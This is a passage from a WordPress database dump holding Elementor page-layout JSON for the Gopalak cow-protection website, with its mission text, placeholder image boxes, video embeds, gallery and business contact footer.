size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9413,1603,'_elementor_page_assets','a:0:{}'),(9415,1604,'_elementor_edit_mode','builder'),(9416,1604,'_elementor_template_type','wp-page'),(9417,1604,'_elementor_version','3.7.8'),(9418,1604,'_wp_page_template','elementor_canvas'),(9419,1604,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 